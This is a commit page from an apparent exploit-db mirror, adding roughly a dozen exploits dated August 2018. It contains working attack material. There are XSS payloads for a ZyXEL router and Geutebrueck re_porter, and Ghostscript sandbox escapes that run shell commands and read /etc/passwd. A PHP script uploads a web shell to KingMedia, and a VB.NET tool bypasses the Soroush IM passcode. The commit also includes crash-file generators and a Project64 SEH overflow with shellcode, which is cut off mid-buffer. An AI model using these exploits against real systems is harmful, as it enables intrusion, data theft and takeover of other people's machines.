bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

DB: 2018-08-23

Browse source 
12 changes to exploits/shellcodes

Textpad 7.6.4 - Denial Of Service (PoC)
UltraISO 9.7.1.3519 - Denial Of Service (PoC)
Easyboot 6.6.0 - Denial Of Service (PoC)
Softdisk 3.0.3 - Denial Of Service (PoC)

Soroush IM Desktop App 0.17.0 - Authentication Bypass
Project64 2.3.2 - Buffer Overflow (SEH)
Ghostscript - Multiple Vulnerabilities
Windows 10 Diagnostics Hub Standard Collector Service - Privilege Escalation

OpenSSH 2.3 < 7.4 - Username Enumeration (PoC)
OpenSSH 2.3 < 7.7 - Username Enumeration (PoC)

Geutebrueck re_porter 7.8.974.20 - Credential Disclosure
ZyXEL VMG3312-B10B - Cross-Site Scripting
KingMedia 4.1 - Remote Code Execution
Geutebrueck re_porter 16 - Cross-Site Scripting
This commit is contained in:
Offensive Security 2018-08-23 05:01:49 +00:00
parent 8750f2fdd7
commit b81a1d9d72
13 changed files with 645 additions and 1 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

35
exploits/hardware/webapps/45236.txt Normal file
View file

@ -0,0 +1,35 @@
# Exploit Title: ZyXEL VMG3312-B10B - Cross-Site Scripting
# Date: 2018-08-21
# Exploit Author: Samet ŞAHİN
# Vendor Homepage: https://www.zyxel.com/
# Software Link: ftp://ftp.zyxel.com.tr/ZyXEL_URUNLERI/MODEMLER/VDSL_MODEMLER/VMG3312-B10B/
# Version: ZyXEL VMG3312-B10B
# Tested on: Mozilla Firefox 61.0.2 & Google Chrome 67.0.3396.99
# Category: Stored XSS
# CVE : N/A
Malicious POST REQUEST :
POST /pages/connectionStatus/connectionStatus-hostEntry.cmd HTTP/1.1
Host: 192.168.1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:54.0) Gecko/20100101 Firefox/54.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://192.168.1.1/index.html
Content-Type: application/x-www-form-urlencoded
Content-Length: 79
Cookie: SESSION=529313605
Connection: close
Upgrade-Insecure-Requests: 1
action=edit&oldip=192.168.1.36&hosttype=&sessionKey=1997367832&hostname=X<svg onload=alert()>
Vulnerable PAGE :
/pages/connectionStatus/connectionStatus-hostEntry.cmd
Vulnerable PARAMETER :
hostname
Cross Site Scripting PAYLOAD :
X<svg onload=alert()>
#Samet ŞAHİN

24
exploits/hardware/webapps/45240.txt Normal file
View file

@ -0,0 +1,24 @@
# Exploit Title: Geutebrueck re_porter 7.8.974.20 - Credential Disclosure
# Date: 2018-08-03
# Exploit Author: Kamil Suska
# Vendor: https://www.geutebrueck.com/en_US.html
# Link: https://www.sourcesecurity.com/geutebruck-re-porter-16-technical-details.html
# Version: prior 7.8.974.20
# CVE-2018-15534
# PoC
GET /statistics/gscsetup.xml HTTP/1.1
Host: example.com:12003
# Result (Redacted):
<Node Name="UserList" NodeID="xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx">
<Node Name="0000" NodeID="xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx">
<Value Name="Name" ValueType="ntWideString" Value="Sysadmin"/>
<Value Name="Password" ValueType="ntString"
Value="##MD5passwordhash##"/>
<Value Name="UserRights" ValueType="ntInt32" Value="0x00000001"/>
<Node Name="SecondUserList"
NodeID="xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx">
</Node>

20
exploits/hardware/webapps/45242.txt Normal file
View file

@ -0,0 +1,20 @@
# Exploit Title: Geutebrueck re_porter 16 - Cross-Site Scripting
# Date: 2018-08-03
# Exploit Author: Kamil Suska
# Vendor: https://www.geutebrueck.com/en_US.html
# Link: https://www.sourcesecurity.com/geutebruck-re-porter-16-technical-details.html
# Version: prior 7.8.974.20
# CVE-2018-15533
# Attack Vectors
http://example.com:12005/modifychannel/exec?vv9r7<script>alert(1)</script>auubw=1
http://example.com:12005/images/IOMemoryPool.png?ebmf6<script>alert(1)</script>pmsih=1
http://example.com:12005/images/Statistics.png?q3dlx<script>alert(1)</script>zjvdw=1
http://example.com:12005/images/GLIBBackground.jpg?itfvf<script>alert(1)</script>irvnl=1
http://example.com:12005/images/MainMemoryPool.png?bzu69<script>alert(1)</script>m2hhj=1
http://example.com:12005/images/ProcessMemory.png?f4d7j<script>alert(1)</script>m5by3=

171
exploits/linux/local/45243.txt Normal file
View file

@ -0,0 +1,171 @@
http://seclists.org/oss-sec/2018/q3/142
These are critical and trivial remote code execution bugs in things like ImageMagick, Evince, GIMP, and most other PDF/PS tools.
----
Hello, this was discussed on the distros list, but it was suggested to move discussion to oss-security.
You might recall I posted a bunch of -dSAFER sandbox escapes in ghostscript a few years ago:
http://seclists.org/oss-sec/2016/q4/29
I found a few file disclosure, shell command execution, memory corruption and type confusion bugs. There was also one that was found exploited in the wild. There was also a similar widely exploited issue that could be exploited identically.
TL;DR: I *strongly* suggest that distributions start disabling PS, EPS, PDF and XPS coders in policy.xml by default.
$ convert input.jpg output.gif
uid=1000(taviso) gid=1000(taviso) groups=1000(taviso),10(wheel) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023
I've found a few more surprising ways to reach ghostscript recently, so went back to look again and found a few more.
1. /invalidaccess checks stop working after a failed restore, so you can just execute shell commands if you handle the error. Exploitation is very trivial. Repro:
$ gs -q -sDEVICE=ppmraw -dSAFER -sOutputFile=/dev/null
GS>legal
GS>{ null restore } stopped { pop } if
GS>legal
GS>mark /OutputFile (%pipe%id) currentdevice putdeviceprops
GS<1>showpage
uid=1000(taviso) gid=1000(taviso) groups=1000(taviso),10(wheel) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023
(ImageMagick PoC at end of mail)
2. setcolor claims no operand checking is necessary, because it's hidden behind a pseudo-operator of the same name. That's true, but you can still call it indirectly via setpattern, so type checking is necessary. Repro:
$ gs -q -sDEVICE=ppmraw -dSAFER
GS><< /Whatever 16#414141414141 >> setpattern
Segmentation fault
3. The LockDistillerParams boolean isn't type checked, so nice easy type confusion. Repro:
$ gs -q -sDEVICE=ppmraw -dSAFER
GS><< /LockDistillerParams 16#4141414141414141 >> .setdistillerparams
Segmentation fault
4. .tempfile permissions don't seem to work, I don't know when they broke. You're not supposed to be able to open files outside of the patterns in the PermitFileReading array, but that doesn't seem to work for me e.g.:
$ strace -fefile gs -sDEVICE=ppmraw -dSAFER
...
GS>(/proc/self/cwd/hello) (w) .tempfile
open("/proc/self/cwd/hello26E8LQ", O_RDWR|O_CREAT|O_EXCL, 0600) = 3
GS<2>dup
GS<3>(hello) writestring
GS<2>closefile
This means you can create a file in any directory (I don't think you can prevent the random suffix). Additionally, I have a trick to let you read and unlink any file you have permission to.
Here is how to unlink() any file:
$ strace -fefile gs -sDEVICE=ppmraw -dSAFER
...
GS>{ .bindnow } stopped {} if
GS>(/etc/passwd) [] .tempfile
GS<2>.quit
unlink("/etc/passwd") = -1 EACCES (Permission denied)
+++ exited with 0 +++
Reading is more complicated, because the best way I know how to do it is to interpret a file as as PostScript and catch the syntax errors, here is an example:
$ cat fileread.ps
/FileToSteal (/etc/passwd) def
errordict /undefinedfilename {
FileToSteal % save the undefined name
} put
errordict /undefined {
(STOLEN: ) print
counttomark {
==only
} repeat
(\n) print
FileToSteal
} put
errordict /invalidfileaccess {
pop
} put
errordict /typecheck {
pop
} put
FileToSteal (w) .tempfile
statusdict
begin
1 1 .setpagesize
end
quit
$ gs -q -sDEVICE=ppmraw -dSAFER fileread.ps
GPL Ghostscript 9.23:
STOLEN: root:x:0:0:root:
STOLEN: daemon:x:1:1:daemon:/bash/bin/root:(/etc/passwd)
STOLEN: bin:x:2:2:bin:/nologin/sbin/usr/sbin:/usr(/etc/passwd)
STOLEN: sys:x:3:3:sys:/nologin/sbin/usr/bin:(/etc/passwd)
STOLEN: sync:x:4:65534:sync:/nologin/sbin/usr/dev:(/etc/passwd)
STOLEN: games:x:5:60:games:/sync/bin/bin:(/etc/passwd)
This can be used to steal arbitrary files from webservers that use ImageMagick by encoding file contents into the image output, see my previous PoC here for an example. i.e. You can make convert malicious.jpg thumbnail.jpg produce an image with the contents of a file visible.
These bugs were found manually, I also wrote a fuzzer and I'm working on minimizing a very large number of testcases that I'm planning to report over the next few days. I will just file those issues upstream and not post each individual one here, you can monitor https://bugs.ghostscript.com/ if you want to. I expect there to be several dozen unique bugs.
In the meantime, I really *strongly* suggest that distributions start disabling PS, EPS, PDF and XPS coders in policy.xml by default. I think this is the number one "unexpected ghostscript" vector, imho this should happen asap. IMHO, -dSAFER is a fragile security boundary at the moment, and executing untrusted postscript should be discouraged, at least by default.
Please note, ImageMagick sends some initialization commands to ghostscript that breaks my minimal PoC, but you can just undo their changes in PostScript.
This one works for me on the version in Ubuntu:
$ cat shellexec.jpeg
%!PS
userdict /setpagedevice undef
save
legal
{ null restore } stopped { pop } if
{ legal } stopped { pop } if
restore
mark /OutputFile (%pipe%id) currentdevice putdeviceprops
$ convert shellexec.jpeg whatever.gif
uid=1000(taviso) gid=1000(taviso) groups=1000(taviso),10(wheel) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023
For CentOS, try this:
$ cat shellexec.jpeg
%!PS
userdict /setpagedevice undef
legal
{ null restore } stopped { pop } if
legal
mark /OutputFile (%pipe%id) currentdevice putdeviceprops
$ convert shellexec.jpeg whatever.gif
uid=1000(taviso) gid=1000(taviso) groups=1000(taviso),10(wheel) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023
################################################################################
Upstream bugs filed so far on https://bugs.ghostscript.com (some have restricted access)
699654 /invalidaccess checks stop working after a failed restore
699655 missing type checking in setcolor
699656 LockDistillerParams boolean missing type checks
699659 missing type check in ztype
699657 .tempfile SAFER restrictions seem to be broken
699658 Bypassing PermitFileReading by handling undefinedfilename error
################################################################################
Repro for "missing type check in ztype":
$ gs -q -sDEVICE=ppmraw -dSAFER
GS>null [[][][][][][][][][][][][][][][]] .type
Segmentation fault
################################################################################
more upstream bugs
699665 memory corruption in aesdecode
699663 .setdistillerkeys memory corruption
699664 corrupt device object after error in job
699660 shading_param incomplete type checking
699661 pdf14 garbage collection memory corruption
699662 calling .bindnow causes sideeffects

57
exploits/php/webapps/45237.php Normal file
View file

@ -0,0 +1,57 @@
# Exploit Title: KingMedia 4.1 - Remote Code Execution
# Author: Efren Diaz
# Exploit Date: 2018-08-15
# Software: KingMedia
# Version: 1.x, 2.x, 3.x, 4.1
# Link: https://codecanyon.net/item/king-media-video-image-upload-and-share/7877877
# CVE: N/A
<?php
// Author: Efren Diaz (elefr3n)
// https://twitter.com/elefr3n
echo "--------------------------------------------\n";
echo "KING MEDIA CMS ARBITRARY FILE UPLOAD EXPLOIT\n";
echo "--------------------------------------------\n";
if (!isset($argv[2]))
{
echo "\nUsage: exploit.php <target> <file> <socks5>\n\n";
echo " -target: http://site.com/... (required)\n";
echo " -file: shell.php (required)\n";
echo " -socks5: 127.0.0.1:1337 (optional)\n\n";
} else {
echo "\nUploading file...\n\n";
$file = $argv[2];
$target = $argv[1];
$mimeType = image_type_to_mime_type(exif_imagetype($file));
$cFile = curl_file_create($file, $mimeType, $file);
$post = array(
'ImageFile'=> $cFile
);
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $target);
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS, $post);
curl_setopt($ch, CURLOPT_HTTPHEADER, array("X-Requested-With: XMLHttpRequest"));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
if (isset($argv[3])) {
curl_setopt($ch, CURLOPT_PROXY, isset($argv[3]));
curl_setopt($ch, CURLOPT_PROXYTYPE, CURLPROXY_SOCKS5);
}
$result=curl_exec($ch);
preg_match_all('/src="(.*)" alt="Resized/i',$result,$uploaded_shell);
if (isset($uploaded_shell[1][0])) {
echo "PWNED ! :D \n\n{$uploaded_shell[1][0]}\n\n";
} else {
echo "Something was bad... str result:\n{$result}";
}
curl_close ($ch);
}

122
exploits/windows/local/45171.vb Normal file
View file

@ -0,0 +1,122 @@
# Exploit Title: Soroush IM Desktop App 0.17.0 - Authentication Bypass
# Date: 2018-08-08
# Exploit Author: VortexNeoX64
# Vendor Homepage: https://soroush-app.ir
# Software Link: https://soroush-app.ir/UploadedData/Soroush.exe
# Version: 0.17.0 BETA
# Tested on: Windows 10 1803 and windows server 2016 14393
# Security Issue:
# It seems that all databases are encrypted with a constant key and then producing same output
# across every other PCs so pushing NO_PASSCODE data ,that was encrypted before, to the databases
# on any other PC, would process the database valid and remove the passcode. The database entriesd are first
# entered in a log file in the same folder of the database, and then the Soroush app pushes the log file
# into permanent database. Attacker can unlock the client app with database injection, and bypass the
# authentication process. This exploit leads to two important security risks:
# 1.Attacker can access to all the data, chats, images, files and etc. then he/she is able to send and receive data in behalf of the original user
# 2.Attacker then may use the exploit to perform an DOS attack. which is done by setting a new passcode for the client without knowing the previews passcode
# PoC (.NET 4.0 Visual Basic)
# PoC dose not support Windows XP, try change "\users\" to "\Documents and Settings\"
Module Module1
Sub Main()
Console.WriteLine("*** [Souroush IM Local Passcode bypass via database injection] ***")
Console.WriteLine("*** [Developed by [VortexNeoX64] 2018] ***")
Console.WriteLine("** [Tested on Windows 10 1803 and windows server 2016 14393 , Soroush version = 0.17.0 BETA] **")
Console.WriteLine("** [Affected systems: probebly Linux, MacOS and for sure Windows] **")
Console.WriteLine("** [Vulnerability type: Local & Privilege Escalation [Passcode bypass] ]**")
Console.WriteLine()
Console.WriteLine("Press any Key to exploit...")
Console.ReadKey()
Dim _temp As Byte() = {237, 4, 235, 105, 158, 3, 1, 16, 0, 0, 0, 0, 0, 0, 0, 1, 0, 0, 0,
1, 88, 97, 81, 122, 79, 114, 86, 89, 53, 79, 111, 73, 79, 77,
90, 49, 52, 102, 83, 101, 122, 80, 113, 121, 122, 88, 49, 70,
65, 108, 56, 52, 116, 112, 87, 75, 77, 117, 115, 122, 117, 109,
72, 101, 116, 51, 43, 54, 122, 106, 55, 117, 108, 74, 66, 47, 99,
107, 110, 87, 113, 107, 84, 111, 74, 66, 52, 118, 53, 74, 120, 75,
47, 114, 122, 57, 122, 73, 53, 116, 43, 76, 122, 68, 116, 86, 81,
61, 61, 182, 6, 123, 34, 100, 97, 116, 97, 34, 58, 34, 57, 105, 105,
116, 76, 114, 118, 88, 76, 98, 99, 66, 67, 74, 52, 87, 102, 68, 55,
106, 66, 82, 72, 109, 110, 113, 66, 57, 110, 82, 85, 90, 81, 54, 85,
49, 113, 78, 120, 75, 55, 57, 98, 106, 85, 106, 109, 74, 102, 122,
105, 67, 111, 65, 100, 114, 99, 98, 82, 119, 54, 43, 75, 68, 72, 47,
108, 85, 82, 90, 77, 119, 73, 103, 70, 113, 57, 75, 57, 112, 115, 57,
97, 49, 69, 47, 77, 104, 73, 51, 51, 114, 80, 83, 81, 113, 99, 117, 49,
89, 87, 101, 49, 83, 75, 98, 103, 78, 84, 72, 113, 89, 82, 87, 71, 73,
43, 88, 111, 85, 105, 69, 55, 72, 120, 121, 120, 57, 50, 90, 116, 116,
43, 81, 75, 100, 103, 114, 67, 77, 120, 122, 65, 66, 66, 50, 117, 85,
87, 68, 119, 67, 113, 68, 105, 53, 67, 111, 86, 69, 108, 77, 43, 113,
90, 106, 118, 75, 100, 66, 99, 112, 120, 99, 47, 110, 80, 84, 67, 55,
117, 111, 116, 86, 115, 89, 50, 89, 55, 88, 89, 49, 88, 52, 78, 69, 52,
100, 105, 110, 71, 120, 67, 87, 118, 118, 73, 106, 107, 80, 51, 85, 114,
75, 48, 51, 100, 67, 114, 71, 85, 75, 119, 98, 70, 48, 85, 101, 73, 50, 77,
108, 97, 84, 67, 100, 49, 97, 77, 43, 119, 83, 80, 111, 99, 110, 105, 66,
97, 67, 48, 52, 56, 82, 83, 110, 97, 120, 75, 56, 88, 55, 84, 89, 83, 111,
65, 111, 115, 98, 117, 78, 80, 66, 110, 103, 72, 52, 110, 68, 97, 112, 74,
84, 104, 108, 120, 104, 85, 78, 117, 70, 103, 57, 48, 98, 65, 87, 100, 83,
111, 75, 105, 69, 65, 56, 69, 106, 105, 52, 120, 69, 111, 97, 49, 70, 109,
73, 49, 69, 83, 110, 67, 66, 117, 114, 76, 111, 70, 75, 53, 73, 111, 81, 49,
74, 115, 79, 105, 74, 108, 119, 51, 89, 116, 69, 70, 71, 121, 121, 102, 76,
110, 85, 73, 121, 56, 49, 54, 85, 71, 80, 87, 69, 53, 79, 90, 53, 74, 72, 50,
66, 117, 84, 47, 79, 90, 65, 77, 111, 57, 88, 115, 88, 68, 105, 77, 121, 108,
111, 66, 105, 105, 75, 81, 49, 56, 117, 50, 85, 104, 78, 109, 97, 119, 79, 67,
74, 78, 120, 53, 108, 51, 118, 48, 68, 104, 84, 51, 76, 75, 106, 69, 103, 55, 86,
84, 115, 79, 80, 65, 121, 118, 54, 90, 90, 83, 118, 82, 51, 67, 118, 109, 66,
86, 57, 108, 52, 114, 70, 120, 71, 50, 52, 108, 113, 66, 70, 70, 101, 115, 105,
120, 88, 102, 74, 122, 108, 90, 69, 111, 68, 120, 80, 115, 70, 109, 116, 88, 67,
65, 110, 65, 86, 106, 70, 74, 54, 49, 80, 67, 104, 104, 84, 120, 67, 116, 115, 82,
73, 108, 78, 77, 109, 90, 122, 77, 90, 80, 73, 99, 80, 104, 115, 68, 83, 80, 80,
72, 76, 98, 49, 56, 56, 67, 84, 80, 80, 47, 116, 85, 48, 72, 122, 116, 101, 83, 105,
68, 47, 66, 97, 84, 107, 50, 104, 102, 121, 82, 66, 114, 72, 78, 75, 56, 118, 89, 101,
122, 122, 82, 117, 85, 102, 43, 78, 111, 111, 79, 43, 90, 73, 51, 69, 71, 90, 52, 69, 57,
48, 75, 101, 80, 82, 52, 48, 122, 76, 49, 118, 116, 68, 65, 78, 98, 80, 47, 109, 57,
122, 53, 87, 83, 105, 113, 118, 110, 47, 111, 66, 69, 78, 51, 100, 67, 72, 106, 120, 80,
81, 55, 119, 54, 78, 68, 120, 108, 86, 108, 83, 117, 119, 113, 120, 78, 87, 47, 86, 102,
117, 65, 74, 77, 84, 84, 121, 103, 73, 80, 89, 87, 73, 117, 85, 111, 101, 54, 118, 106, 71,
83, 69, 118, 101, 78, 80, 72, 121, 99, 99, 88, 122, 90, 76, 122, 71, 90, 102, 66, 85, 87, 81,
101, 75, 74, 99, 86, 68, 80, 103, 109, 43, 88, 66, 80, 73, 56, 47, 101, 107, 111, 101, 71, 104,
108, 97, 107, 70, 75, 85, 112, 112, 57, 75, 99, 102, 111, 111, 97, 75, 51, 56, 48, 121, 78, 115,
87, 118, 52, 119, 88, 51, 65, 116, 51, 118, 111, 114, 74, 81, 101, 119, 117, 89, 97, 76, 78, 114,
116, 52, 68, 121, 122, 90, 107, 52, 98, 117, 68, 110, 87, 119, 85, 48, 97, 122, 109, 104, 71, 111,
69, 119, 88, 66, 78, 108, 81, 79, 89, 54, 49, 117, 66, 103, 78, 110, 78, 103, 82, 65, 61, 61,
34, 44, 34, 116, 121, 112, 101, 34, 58, 34, 112, 114, 105, 109, 105, 116, 105, 118, 101, 34, 125}
Try
Console.WriteLine("Killing the app...")
Shell("Taskkill /im soroush.exe /f /t ", AppWinStyle.Hide, True)
Console.WriteLine("Making malicious database...")
Dim target As String = ""
Dim targetname As String = ""
Dim index As Integer = 0
Dim _info As IO.FileInfo()
Dim _Dirinfo As New IO.DirectoryInfo(Environment.GetFolderPath(Environment.SpecialFolder.System).Substring(0, 1) & ":\Users\" & Environment.UserName & "\AppData\Roaming\Soroush\Data\73b880c1b168541ab6e01acc2f7bf46f06379320\")
IO.File.WriteAllBytes(Environment.CurrentDirectory & "\log.log", _temp)
Console.WriteLine("Getting orginal database name....")
_info = _Dirinfo.GetFiles()
For i = 0 To _info.Count - 1
If _info(i).Extension = ".log" Then
target = _info(i).FullName
targetname = _info(i).Name
index = i
Exit For
End If
Next
Console.WriteLine("Target file is : [" & target & "]")
Console.WriteLine("Renaming malicious database to [" & targetname & "]")
IO.File.Move(Environment.CurrentDirectory & "\log.log", Environment.CurrentDirectory & "\" & targetname)
Console.WriteLine("injecting database [" & target & "]")
Threading.Thread.Sleep(1500)
IO.File.Delete(target)
IO.File.Copy(Environment.CurrentDirectory & "\" & targetname, target)
Console.WriteLine("Done!")
Catch ex As Exception
Console.WriteLine(ex.Message)
Beep()
Finally
Console.ReadKey()
End Try
End Sub
End Module

52
exploits/windows/local/45244.txt Normal file
View file

@ -0,0 +1,52 @@
SystemCollector
PoC for Privilege Escalation in Windows 10 Diagnostics Hub Standard Collector Service
Affected Products
Windows 10
Windows Server
Windows Server 2016
Visual Studio 2015 Update 3
Visual Studio 2017
Summary
The Diagnostics Hub Packaging library, used by Windows Standard Collector Service, can be forced to copy an arbitrary file to an arbitrary location due to lack of client impersonation in DiagnosticsHub.StandardCollector.Runtime.dll.
Here is a detailed write-up on how this vulnerability was found and exploited: Privilege Escalation Vulnerability in Windows Standard Collector Service.
Technical Details
The Standard Collector Service allows for a several values to be defined when configuring a diagnostics session, including the scratch directory and session ID. The session ID can be any GUID and the scratch directory can be any location the user has write permissions too. If the collection session is configured with an ID of c13851b2-b1e1-438f-bf73-949df897f1bf and a scratch path of C:\Users\Bob\AppData\Local\Temp\Microsoft\F12\perftools\visualprofiler\, the following events occur when calling the GetCurrentResult method of the ICollectionSession object:
An Event Trace Log (.etl) file is created in the scratch path: C:\Users\Bob\AppData\Local\Temp\Microsoft\F12\perftools\visualprofiler\c13851b2-b1e1-438f-bf73-949df897f1bf.1.m.etl
A Report folder is also created in the scratch path: C:\Users\Bob\AppData\Local\Temp\Microsoft\F12\perftools\visualprofiler\Report.c13851b2-b1e1-438f-bf73-949df897f1bf.1
A folder with a random GUID is created in the report folder: C:\Users\Bob\AppData\Local\Temp\Microsoft\F12\perftools\visualprofiler\Report.c13851b2-b1e1-438f-bf73-949df897f1bf.1\EAD6A227-31D4-4EA2-94A9-5DF276F69E65
These folders and ETL files are created by the collector service for the .diagsession package that is normally created when a session has ended. Calling the Stop method on the ICollectionSession object will cause the collector service to commit the diagnostics package by calling Microsoft::DiagnosticsHub::Packaging::DhPackageDirectory::CommitPackage. The CommitPackage function will copy or move the original {scratch path}\c13851b2-b1e1-438f-bf73-949df897f1bf.1.m.etl file to the random GUID folder: {scratch path}\Report.c13851b2-b1e1-438f-bf73-949df897f1bf.1\EAD6A227-31D4-4EA2-94A9-5DF276F69E65\c13851b2-b1e1-438f-bf73-949df897f1bf.1.m.etl
The copy/move operation triggered by the CommitPackagingResult function in DiagnosticsHub.StandardCollector.Runtime.dll, is performed without impersonating the user (unlike the initial file/folder creation), leading to a possible TOCTOU issue if the target folder is replaced with a mount point that redirects the copy to an arbitrary location. To exploit this issue in a useful way, an attacker would need to swap the contents of the ETL file before it is copied. This can be done by beating the race condition with an OpLock after the file handle has been released by the service.
Although we don't fully control the name of the .etl file that is copied, we can use the object directory symlink trick to control it. The mount point+symlink setup would look something like this:
Mount point: {scratch path}\Report.c13851b2-b1e1-438f-bf73-949df897f1bf.1\EAD6A227-31D4-4EA2-94A9-5DF276F69E65\ -> \RPC Control\
Symlink: \RPC Control\c13851b2-b1e1-438f-bf73-949df897f1bf.1.m.etl -> C:\Windows\System32\anything.dll
Having control of the file contents, copy location, and file name gives an attacker numerous DLL loading possibilities. However, the included PoC demonstrates how control of the filename is not needed since the collector service happily load a DLL with any filename, as long as it is in C:\Windows\System32 or C:\Windows\System32\DiagSvcs directory. This is done by starting a new collector session with an agent that has an assembly name matching the name of the copied DLL c13851b2-b1e1-438f-bf73-949df897f1bf.1.m.etl.
The included PoC is a VS solution with a C++ DLL project for the notepad.exe popping payload and a C# project to interact with the service and exploit the vulnerability with the NtApiDotNet library.
Steps to reproduce:
Build Visual Studio Solution
Execute SystemCollector.exe as a normal user
Expected Result:
The package commit operation impersonates the user and fails when trying to copy the file.
Observed Result:
The file is copied to the mount point target folder C:\Windows\System32, then loaded as a collector agent, and finally, notepad.exe is spawned as SYSTEM privileges.
Additional References
https://www.atredis.com/blog/cve-2018-0952-privilege-escalation-vulnerability-in-windows-standard-collector-service
https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-0952
https://github.com/atredispartners/advisories/blob/master/ATREDIS-2018-0004.md
Proof of Concept:
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/45244.zip

21
exploits/windows_x86-64/dos/45239.py Executable file
View file

@ -0,0 +1,21 @@
# Exploit Title : UltraISO 9.7.1.3519 - Denial Of Service (PoC)
# Exploit Author : Ali Alipour
# WebSite : Alipour.it
# Date: 2018-08-22
# Vendor Homepage : https://www.ultraiso.com
# Software Link Download : https://www.ultraiso.com/download.html
# Tested on : Windows 10 - 64-bit
# Steps to Reproduce
# Run the python exploit script, it will create a new
# file with the name "exploit.txt" just copy the text inside "exploit.txt"
# and start the UltraISO program.
# In the new window click "Tools" > "Mount To Virtual Drive" .
# Now Paste the content of "exploit.txt" into the field: " Image File ".
# Click "Mount" and you will see a crash.
#!/usr/bin/env python
buffer = "\x41" * 2048
f = open ("exploit.txt", "w")
f.write(buffer)
f.close()

25
exploits/windows_x86/dos/45238.py Executable file
View file

@ -0,0 +1,25 @@
# Exploit Title: Textpad 7.6.4 - Denial Of Service (PoC)
# Author: Gionathan "John" Reale
# Discovey Date: 2018-08-22
# Homepage: https://textpad.com
# Software Link: https://textpad.com/download/v76/win32/txpeng764-32.zip
# Tested Version: 7.6.4
# Tested on OS: Windows 7 32-bit
# Steps to Reproduce: Run the python exploit script, it will create a new
# file with the name "exploit.txt" just copy the text inside "exploit.txt"
# and start the program. In the new window click "Tools" > "Run...". Now paste the content of
# "exploit.txt" into the fields:"Command". Click "OK" and you will see a crash.
#!/usr/bin/python
buffer = "A" * 6000
payload = buffer
try:
f=open("exploit.txt","w")
print "[+] Creating %s bytes evil payload.." %len(payload)
f.write(payload)
f.close()
print "[+] File created!"
except:
print "File cannot be created"

25
exploits/windows_x86/dos/45241.py Executable file
View file

@ -0,0 +1,25 @@
# Exploit Title: Easyboot 6.6.0 - Denial Of Service (PoC)
# Author: Gionathan "John" Reale
# Discovey Date: 2018-08-22
# Homepage: http://www.ezbsystems.com/
# Software Link: http://www.ezbsystems.com/easyboot/download.htm
# Tested Version: 6.6.0
# Tested on OS: Windows 7 32-bit
# Steps to Reproduce: Run the python exploit script, it will create a new
# file with the name "exploit.txt" just copy the text inside "exploit.txt"
# and start the program. In the new window click "File" > "Tools" > "Replace Text...". Now paste the content of
# "exploit.txt" into all three fields in the new window. Click "Replace" and you will see a crash.
#!/usr/bin/python
buffer = "A" * 7000
payload = buffer
try:
f=open("exploit.txt","w")
print "[+] Creating %s bytes evil payload.." %len(payload)
f.write(payload)
f.close()
print "[+] File created!"
except:
print "File cannot be created"

27
exploits/windows_x86/dos/45245.py Executable file
View file

@ -0,0 +1,27 @@
# Exploit Title: Softdisk 3.0.3 - Denial Of Service (PoC)
# Author: Gionathan "John" Reale
# Discovey Date: 2018-08-22
# Homepage: http://www.ezbsystems.com/
# Software Link: https://www.ezbsystems.com/softdisc/download.htm
# Tested Version: 3.0.3
# Tested on OS: Windows 7 32-bit
# Steps to Reproduce: Run the python exploit script, it will create a new
# file with the name "exploit.txt" just copy the text inside "exploit.txt"
# and start the program. In the new window click "Help" >"Enter Registration Code...".
# Now in the new window paste the content of "exploit.txt" into the field:"Registration Name"
# and add the following into the "Registration Code" field:"1234567891011121".
# Click "OK" and you will see a crash.
#!/usr/bin/python
buffer = "A" * 6000
payload = buffer
try:
f=open("exploit.txt","w")
print "[+] Creating %s bytes evil payload.." %len(payload)
f.write(payload)
f.close()
print "[+] File created!"
except:
print "File cannot be created"

53
exploits/windows_x86/local/45235.py Executable file
View file

@ -0,0 +1,53 @@
# Exploit Title: Project64 2.3.2 - Local BufferOverflow (SEH)
# Date: 2018-08-21
# Author: Shubham Singh
# Known As: Spirited Wolf [Twitter: @Pwsecspirit]
# Software Link:https://www.pj64-emu.com/download/project64-latest
# Tested Version: 2.3.2
# Tested on OS: Windows XP Service Pack 3 x86 , Windows 7 ultimate x86
# Steps to Reproduce:
# 1. Run the python exploit script, it will create a new file with the name "exploit.txt".
# 2. Just copy the text inside "exploit.txt".
# 3. Start the program. In the new window click "Options" > "Settings" > "Directories".
# 4. Now paste the content of "exploit.txt" into the field:"Plugin Directory" and make sure it is selected. Click "Apply" > "Ok"
# You will see a sweet calculator poped up.
# Greetz: @hexachordanu @FuzzySec @LiveOverflow
junk = "A" * 380
nseh = "\xEB\x06\x90\x90"
#0x10096609 : pop ebx # pop eax # ret | ascii {PAGE_EXECUTE_READWRITE} [Jabo_Direct3D8.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v1.7.0.57-ver5 (C:\Program Files\Project64 2.3\Plugin\GFX\Jabo_Direct3D8.dll)
seh = "\x09\x66\x09\x10"
nops = "\x90" * 18
#badchar \x00\x0a\x0d\x2f
buf = ""
buf += "\xba\x9a\x98\xaf\x7e\xdd\xc2\xd9\x74\x24\xf4\x5f\x29"
buf += "\xc9\xb1\x31\x83\xc7\x04\x31\x57\x0f\x03\x57\x95\x7a"
buf += "\x5a\x82\x41\xf8\xa5\x7b\x91\x9d\x2c\x9e\xa0\x9d\x4b"
buf += "\xea\x92\x2d\x1f\xbe\x1e\xc5\x4d\x2b\x95\xab\x59\x5c"
buf += "\x1e\x01\xbc\x53\x9f\x3a\xfc\xf2\x23\x41\xd1\xd4\x1a"
